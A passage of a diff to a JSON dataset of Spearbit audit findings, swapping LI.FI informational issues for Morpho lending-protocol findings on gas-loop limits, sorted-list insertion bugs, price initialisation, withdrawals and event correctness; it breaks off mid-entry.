unmatchBorrowers can consume while trying to match/unmatch supplier/borrower and also updating their position if matched. maxGas = 0 will make entirely skip the loop. maxGas low would make the loop run at least one time but the smaller maxGas is the higher is the possibility that not all the available suppliers/borrowers are matched/unmatched. maxGas could make the loop consume all the block gas, making the tx revert. Note that maxGas can be overriden by the user when calling supply, borrow", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Comment is not compatible with code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the HyphenFacet, Comment is mentioned that approval is given to Anyswap. But, approval is given to Hyphen router. function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); if (_hyphenData.token != address(0)) { // Give Anyswap approval to bridge tokens LibAsset.maxApproveERC20(IERC20(_hyphenData.token), _hyphenData.router, _hyphenData.amount); }", + "title": "NDS min/max value should be properly validated to avoid tx to always fail/skip loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "PositionsManagerForAaveLogic is currently initialized with a default value of NDS = 20. The NDS value is used by MatchingEngineForAave when it needs to call DoubleLinkedList.insertSorted in both updateBorrowers and updateSuppliers updateBorrowers, updateSuppliers are called by MatchingEngineForAavematchBorrowers MatchingEngineForAaveunmatchBorrowers MatchingEngineForAavematchSuppliers MatchingEngineForAaveunmatchSuppliers Those functions and also directly updateBorrowers and updateSuppliers are also called by PositionsManager- ForAaveLogic Problems: A low NDS value would make the loop inside insertSorted exit early, increasing the probability of a sup- plier/borrower to be added to the tail of the list. This is something that Morpho would like to avoid because it would decrease protocol performance when it needs to match/unmatch suppliers/borrowers. In the case where a list is long enough, a very high value would make the tranaction revert each time one of those function directly or indirectly call insertSorted. The gas rail guard present in the match/unmatch supplier/borrow is useless because the loop would be called at least one time.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Move whitelist to LibSwap.swap()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function LibSwap.swap() is dangerous because it can call any function of any contract. If this is exposed to the outside (like in GenericBridgeFacet), is might enable access to transferFrom() and thus stealing tokens. Also see issue \"Too generic calls in GenericBridgeFacet allow stealing of tokens\" Luckily most of the time LibSwap.swap() is called via _executeSwaps(), which has a whitelist and reduces the risk. To improve security it would be better to integrate the whitelists in LibSwap.swap(). Note: also see issue \"_executeSwaps of Executor.sol doesnt have a whitelist\" library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { if (!LibAsset.isContract(_swapData.callTo)) revert InvalidContract(); ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } } contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } }", + "title": "Initial SwapManager cumulative prices values are wrong", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The initial cumulative price values are integer divisions of unscaled reserves and not UQ112x112 fixed-point values. (reserve0, reserve1, blockTimestampLast) = pair.getReserves(); price0CumulativeLast = reserve1 / reserve0; price1CumulativeLast = reserve0 / reserve1; One of these values will (almost) always be zero due to integer division. Then, when the difference is taken to the real currentCumulativePrices in update, the TWAP will be a large, wrong value. The slippage checks will not work correctly.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Redundant check on the HyphenFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the HyphenFacet, there is a condition which checks source chain is different than destination chain id. However, the conditional check is already placed on the Hyphen contracts. _depositErc20, _depositNative) function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); }", + "title": "User withdrawals can fail if Morpho position is close to liquidation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\"). If Morphos position on Aaves debt / collateral value is higher than the markets maximum LTV ratio but lower than the markets liquidation threshold, the borrow will fail and the position cannot be liquidated. Therefore withdrawals could fail.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Check input amount equals swapped amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The bridge functions dont check that input amount ( _bridgeData.amount or msg.value) is equal to the swapped amount (_swapData[0].fromAmount). This could lead to funds remaining in the LiFi Diamond or Executor. Luckily noLeftovers() or checks on startingBalance solve this by sending the remaining balance to the origina- tor or receiver. However this is fixing symptoms instead of preventing the issue. function swapAndStartBridgeTokensViaOmniBridge( ... LibSwap.SwapData[] calldata _swapData, BridgeData calldata _bridgeData ) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... }", + "title": "Event Withdrawn is emitted using the wrong amounts of supplyBalanceInOf", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Inside the _withdraw function, all changes performed to supplyBalanceInOf are done using the _supplier address. The _receiver is correctly used only to transfer the underlying token via underlyingToken.safeTransfer(_- receiver, _amount); The Withdrawn event should be emitted passing the supplyBalanceInOf[_poolTokenAddress] of the supplier and not the receiver. This problem will arise when this internal function is called by PositionsManagerForAave.liquidate where sup- plier (borrower in this case) and receiver (liquidator) would not be the same address.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Use same layout for facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The different bridge facets use different layouts for the source code. This can be seen at the call to _startBridge(). The code is easier to maintain If it is the same everywhere. 62 AmarokFacet.sol: ArbitrumBridgeFacet.sol: OmniBridgeFacet.sol: OptimismBridgeFacet.sol: PolygonBridgeFacet.sol: StargateFacet.sol: AcrossFacet.sol: CBridgeFacet.sol: GenericBridgeFacet.sol: GnosisBridgeFacet.sol: HopFacet.sol: HyphenFacet.sol: NXTPFacet.sol: AnyswapFacet.sol: WormholeFacet.sol: AxelarFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, true); _startBridge(_stargateData, _lifiData, nativeFee, true); _startBridge(_acrossData); _startBridge(_cBridgeData); _startBridge(_bridgeData); _startBridge(gnosisBridgeData); _startBridge(_hopData); _startBridge(_hyphenData); _startBridge(_nxtpData); _startBridge(_anyswapData, underlyingToken, isNative); _startBridge(_wormholeData); // no _startBridge", + "title": "_repayERC20ToPool is approving the wrong amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "_repayERC20ToPool is approving the amount of underlying token specified via the input parameter _amount when the correct amount that should be approved is the one calculated via: _amount = Math.min( _amount, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) );", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Safety check is missing on the remaining amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the FeeCollector contract, There is no safety check to ensure remaining amount doesnt under- flow and revert. function collectNativeFees( uint256 integratorFee, uint256 lifiFee, address integratorAddress ) external payable { ... ... } uint256 remaining = msg.value - (integratorFee + lifiFee);", + "title": "Possible unbounded loop over enteredMarkets array in _getUserHypotheticalBalanceStates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "PositionsManagerForAaveLogic._getUserHypotheticalBalanceStates is looping enteredMar- kets which could be an unbounded array leading to a reverted transaction caused by a block gas limit. While it is true that Morpho will probably handle a subset of assets controlled by Aave, this loop could still revert because of gas limits for a variety of reasons: In the future Aave could have more assets and Morpho could match 1:1 those assets. Block gas size could decrease. Opcodes could cost more gas.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Entire struct can be emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The emit LiFiTransferStarted() generally outputs the entire struct _lifiData by specifying all Its also possible to emit the entire struct in one go. This would make the code smaller and fields of the struct. easier to maintain. function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", + "title": "Missing parameter validation on setters and event spamming prevention", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "User parameter validity should always be verified to prevent contract updates in an inconsistent state. The parameters value should also be different from the old one in order to prevent event spamming (emitting an event when not needed) and improve contract monitoring. contracts/aave/RewardsManagerForAave.sol 20 function setAaveIncentivesController(address _aaveIncentivesController) external override onlyOwner { + + } require(_aaveIncentivesController != address(0), \"param != address(0)\"); require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); contracts/aave/MarketsManagerForAave.sol function setReserveFactor(address _marketAddress, uint16 _newReserveFactor) external onlyOwner { reserveFactor[_marketAddress] = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; updateRates(_marketAddress); emit ReserveFactorSet(_marketAddress, reserveFactor[_marketAddress]); require(_marketAddress != address(0), \"param != address(0)\"); uint16 finalReserveFactor = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; if( finalReserveFactor !== reserveFactor[_marketAddress] ) { reserveFactor[_marketAddress] = finalReserveFactor; emit ReserveFactorSet(_marketAddress, finalReserveFactor); } updateRates(_marketAddress); - - - - - - - + + + + + + + + + + + } function setNoP2P(address _marketAddress, bool _noP2P) external onlyOwner isMarketCreated(_marketAddress) { + } require(_noP2P != noP2P[_marketAddress], \"param != prevValue\"); noP2P[_marketAddress] = _noP2P; emit NoP2PSet(_marketAddress, _noP2P); function updateP2PExchangeRates(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateP2PExchangeRates(_marketAddress); + { } 21 function updateSPYs(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateSPYs(_marketAddress); + { } contracts/aave/positions-manager-parts/PositionsManagerForAaveGettersSetters.sol function setAaveIncentivesController(address _aaveIncentivesController) external onlyOwner { require(_aaveIncentivesController != address(0), \"param != address(0)\"); require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); + + } Important note: _newNDS min/max value should be accurately validated by the team because this will influence the maximum number of cycles that DDL.insertSorted can do. Setting a value too high would make the transaction fail while setting it too low would make the insertSorted loop exit earlier, resulting in the user being added to the tail of the list. A more detailed issue about the NDS value can be found here: #33 function setNDS(uint8 _newNDS) external onlyOwner { // add a check on `_newNDS` validating correctly max/min value of `_newNDS` require(NDS != _newNDS, \"param != prevValue\"); NDS = _newNDS; emit NDSSet(_newNDS); + + } Important note: _newNDS set to 0 would skip all theMatchingEngineForAave match/unmatch supplier/borrower functions if the user does not specify a custom maxGas A more detailed issue about NDS value can be found here: #34 function setMaxGas(MaxGas memory _maxGas) external onlyOwner { // add a check on `_maxGas` validating correctly max/min value of `_maxGas` // add a check on `_maxGas` internal value checking that at least one of them is different compared to the old version maxGas = _maxGas; emit MaxGasSet(_maxGas); + + ,! } function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner { require(_newTreasuryVaultAddress != address(0), \"param != address(0)\"); require(_newTreasuryVaultAddress != treasuryVault, \"param != prevValue\"); treasuryVault = _newTreasuryVaultAddress; emit TreasuryVaultSet(_newTreasuryVaultAddress); + + } function setRewardsManager(address _rewardsManagerAddress) external onlyOwner { require(_rewardsManagerAddress != address(0), \"param != address(0)\"); require(_rewardsManagerAddress != rewardsManager, \"param != prevValue\"); rewardsManager = IRewardsManagerForAave(_rewardsManagerAddress); emit RewardsManagerSet(_rewardsManagerAddress); + + } Important note: Should also check that _poolTokenAddress is currently handled by the PositionsManagerForAave and by the MarketsManagerForAave. Without this check a poolToken could start in a paused state. 22 + function setPauseStatus(address _poolTokenAddress) external onlyOwner { require(_poolTokenAddress != address(0), \"param != address(0)\"); bool newPauseStatus = !paused[_poolTokenAddress]; paused[_poolTokenAddress] = newPauseStatus; emit PauseStatusSet(_poolTokenAddress, newPauseStatus); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Redundant return value from internal function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Callers of NXTPFacet._startBridge() function never use its return value.", + "title": "DDL should prevent inserting items with 0 value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Currently the DDL library is only checking that the actual value (_list.accounts[_id].value) in the list associated with the _id is 0 to prevent inserting duplicates. The DDL library should also verify that the inserted value is greater than 0. This check would prevent adding users with empty values, which may potentially cause the list and as a result the overall protocol to underperform.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Change comment on the LibAsset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The following comment is used in the LibAsset.sol contract. However, Connext doesnt have this file anymore and deleted with the following commit. /// @title LibAsset /// @author Connext /// @notice This library contains helpers for dealing with onchain transfers /// /// library LibAsset {} of assets, including accounting for the native asset `assetId` conventions and any noncompliant ERC20 transfers", + "title": "insertSorted iterates more than max iterations parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The insertSorted function iterates _maxIterations + 1 times instead of _maxIterations times.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Integrate all variants of _executeAndCheckSwaps()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are multiple functions that are more or less the same: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet As these are important functions it is worth the trouble to have one code base to maintain. For example swapAnd- CompleteBridgeTokens() doesnt check msg.value ==0 when ERC20 tokens are send. Note: swapAndCompleteBridgeTokensViaStargate() of StargateFacet.sol already uses SwapperV2.sol", + "title": "insertSorted does not behave like a FIFO for same values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Users that have the same value are inserted into the list before other users with the same value. It does not respect the \"seniority\" of the users order and should behave more like a FIFO queue.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Utilize NATIVE_ASSETID constant from LibAsset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the codebase, LibAsset library contains the variable which defines zero address. However, on the facets the check is repeated. Code should not be repeated and its better to have one version used everywhere to reduce likelihood of bugs. contract AcrossFacet { address internal constant ZERO_ADDRESS = 0x0000000000000000000000000000000000000000; } contract DexManagerFacet { if (_dex == 0x0000000000000000000000000000000000000000) } contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; ... } address sendTo = (_to == address(0)) ? msg.sender : _to;", + "title": "insertSorted inserts elements at wrong index", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The insertSorted function inserts elements after the last element has been insterted, when these should have actually been insterted before the last element. The sort order is therefore wrong, even if the maximum iterations count has not been reached. This is because of the check that the current element is not the tail. if ( ... && current != _list.tail) { insertBefore } else { insertAtEnd } Example: list = [20]. insert(40) then current == list.tail, and is inserted at the back instead of the front. result = [20, 40] list = [30, 10], insert(20) insertion point should be before current == 10, but also current == tail therfore the current != _list.tail condition is false and the element is wrongly inserted at the end. result = [30, 10, 20]", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Native matic will be treated as ERC20 token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "LiFi supports Polygon on their implementation. However, Native MATIC on the Polygon has the contract 0x0000000000000000000000000000000000001010 address. Even if, It does not pose any risk, Native Matic will be treated as an ERC20 token. contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; // address(0) ...", + "title": "PositionsManagerForAaveLogic gas optimization suggestions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Update the remainingTo variable only when needed. Inside each function, the remainingTo counter could be moved inside the if statement to avoid calculation when the amount that should be subtracted is >0.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "Multiple versions of noLeftovers modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The modifier noLeftovers is defined in 3 different files: Swapper.sol, SwapperV2.sol and Ex- ecutor.sol. While the versions on Swapper.sol and Executor.sol are the same, they differ with the one in Executor.sol. Assuming the recommendation for \"Processing of end balances\" is followed, the only difference is that noLeftovers in SwapperV2.sol doesnt revert when new balance is less than initial balance. Code should not be repeated and its better to have one version used everywhere to reduce likelihood of bugs.", + "title": "MarketsManagerForAave._updateSPYs could store calculations in local variables to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The calculation in the actual code must be updated following this issue: #36. This current issue is an example on how to avoid an additional SLOAD. The function could store locally currentReserveFactor, newSupplyP2PSPY and newBorrowP2PSPY to avoid addi- tional SLOAD", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "Reduce unchecked scope", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Both zapIn() functions in FusePoolZap.sol operate in unchecked block which means any contained arithmetic can underflow or overflow. Currently, it effects only one line in both functions: FusePoolZap.sol#L67: uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance; FusePoolZap.sol#L104 mintAmount = mintAmount - preMintBalance; Having unchecked for such a large scope when it is applicable to only one line is dangerous.", + "title": "Declare variable as immutable/constant and remove unused variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Some state variable can be declared as immutable or constant to save gas. Constant variables should be names in uppercase + snake case following the official Solidity style guide. Additionally, variables which are never used across the protocol code can be removed to save gas during deployment and improve readability. RewardsManagerForAave.sol -ILendingPoolAddressesProvider public addressesProvider; -ILendingPool public lendingPool; +ILendingPool public immutable lendingPool; -IPositionsManagerForAave public positionsManager; +IPositionsManagerForAave public immutable positionsManager; SwapManagerUniV2.sol -IUniswapV2Router02 public swapRouter = IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter ,! +IUniswapV2Router02 public constant SWAP_ROUTER = ,! IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter -IUniswapV2Pair public pair; +IUniswapV2Pair public immutable pair; SwapManagerUniV3.sol 27 -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -address public WETH9; // Intermediate token address. +address public immutable WETH9; // Intermediate token address. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -bool public singlePath; +bool public boolean singlePath; SwapManagerUniV3OnEth.sol -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -IUniswapV3Pool public pool2; +IUniswapV3Pool public immutable pool2;", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "No event exists for core paths/functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces. There are 4 instances of this issue: 67 contract PeripheryRegistryFacet { function registerPeripheryContract(...) ... { } } contract LibAccess { function addAccess(...) ... { } function removeAccess(...) ... { } } contract AccessManagerFacet { function setCanExecute(...) ... { } }", + "title": "Function does not revert if balance to transfer is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Currently when the claimToTreasury() function is called it gets the amountToClaim by using un- derlyingToken.balanceOf(address(this). It then uses this amountToClaim in the safeTransfer() function and the ReserveFeeClaimed event is emitted. The problem is that the function does not take into account that it is possible for the amountToClaim to be 0. In this case the safeTransfer function would still be called and the ReserveFeeClaimed event would still be emitted unnecessarily.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "Rename _receiver to _leftoverReceiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the contracts Swapper.sol, SwapperV2.sol and Executor.sol the parameter _receiver is used in various places. Its name seems to suggest that the result of the swapped tokens are send to the _receiver, however this is not the case. Instead the left over tokens are send to the _receiver. This makes the code more difficult to read and maintain. contract SwapperV2 is ILiFi { modifier noLeftovers(..., address payable _receiver) { ... } function _executeAndCheckSwaps(..., address payable _receiver) ... { ... } function _executeSwaps(..., address payable _receiver) ... { ... } }", + "title": "matchingEngine should be initialized in PositionsManagerForAaveLogics initialize function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "MatchingEngineForAave inherits from PositionsManagerForAaveStorage which is an UUPSUp- gradeable contract. Following UUPS best practices, should also be initialized. the MatchingEngineForAave deployed by PositionsManagerForAaveLogic", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Native tokens dont need SwapData.approveTo", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. These checks also include a check on approveTo, however approveTo is not relevant when a native token is being used. Currently the caller of the Lifi Diamond has to specify a whitelisted currentSwapData.approveTo to be able to execute _executeSwaps() which doesnt seem logical. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } }", + "title": "Misc: notation, style guide, global unit types, etc", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Follow solidity notation, standard style guide and global unit types to improve readability.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Inaccurate comment on the maxApproveERC20() function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been observed that comment is incompatible with the functionality. maxApproveERC20 function approves MAX If asset id does not have sufficient allowance. The comment can be replaced with If a sufficient allowance is not present, the allowance is set to MAX. /// @notice Gives MAX approval for another address to spend tokens /// @param assetId Token address to transfer /// @param spender Address to give spend approval to /// @param amount Amount to approve for spending function maxApproveERC20( IERC20 assetId, address spender, uint256 amount )", + "title": "Outdated or wrong Natspec documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Some Natspec documentation is missing parameters/return value or is not correctly updated to reflect the function code.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Undocumented contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "All systematic contracts are documented on the docs directory. However, several contracts are not documented. LiFi is integrated with third party platforms through API. To understand code functionality, the related contracts should be documented in the directory.", + "title": "Use the official UniswapV3 0.8 branch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The current repository creates local copies of the UniswapV3 codebase and manually migrates the contracts to Solidity 0.8.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Utilize built-in library function on the address check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the codebase, LibAsset library contains the function which determines whether the given assetId is the native asset. However, this check is not used and many of the other contracts are applying address check seperately. contract AmarokFacet { function startBridgeTokensViaAmarok(...) ... { ... if (_bridgeData.assetId == address(0)) ... } function swapAndStartBridgeTokensViaAmarok(... ) ... { ... if (_bridgeData.assetId == address(0)) ... } } contract AnyswapFacet { function swapAndStartBridgeTokensViaAnyswap(...) ... { ... if (_anyswapData.token == address(0)) revert TokenAddressIsZero(); ... } } contract HyphenFacet { function _startBridge(...) ... { ... if (_hyphenData.token != address(0)) ... } } contract StargateFacet { function _startBridge(...) ... { ... if (token == address(0)) ... 70 } } contract LibAsset { function transferFromERC20(...) ... { ... if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); ... } function transferAsset(...) ... { ... (assetId == NATIVE_ASSETID) ... } }", + "title": "Unused events and unindexed event parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Certain parameters should be defined as indexed to track them from web3 applications / security monitoring tools.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Consider using wrapped native token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The code currently supports bridging native tokens. However this has the following drawbacks: not every bridge supports native tokens; native tokens have an inherent risk of reentrancy; native tokens introduce additional code paths, which is more difficult to maintain and results in a higher risk of bugs. Also wrapped tokens are more composable. This is also useful for bridges that currently dont support native tokens like the AxelarFacet, the WormholeFacet, and the StargateFacet.", + "title": "Rewards are ignored in the on-pool rate computation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Morpho claims that the protocol is a strict improvement upon the underlying lending protocols. It tries to match as many suppliers and borrowers P2P at the supply/borrow mid-rate of the underlying protocol. However, given high reward incentives paid out to on-pool users it could be the case that being on the pool yields a better rate than the P2P rate.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Incorrect event emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Li.fi follows a two-step ownership transfer pattern, where the current owner first proposes an address to be the new owner. Then that address accepts the ownership in a different transaction via confirmOwnership- Transfer(): function confirmOwnershipTransfer() external { if (msg.sender != pendingOwner) revert NotPendingOwner(); owner = pendingOwner; pendingOwner = LibAsset.NULL_ADDRESS; emit OwnershipTransferred(owner, pendingOwner); } At the time of emitting OwnershipTransferred, pendingOwner is always address(0) and owner is the new owner. This event should be used to log the addresses between which the ownership transfer happens.", + "title": "tradingFunction returns wrong invariant at bounds, allowing to steal all pool reserves", + "html_url": 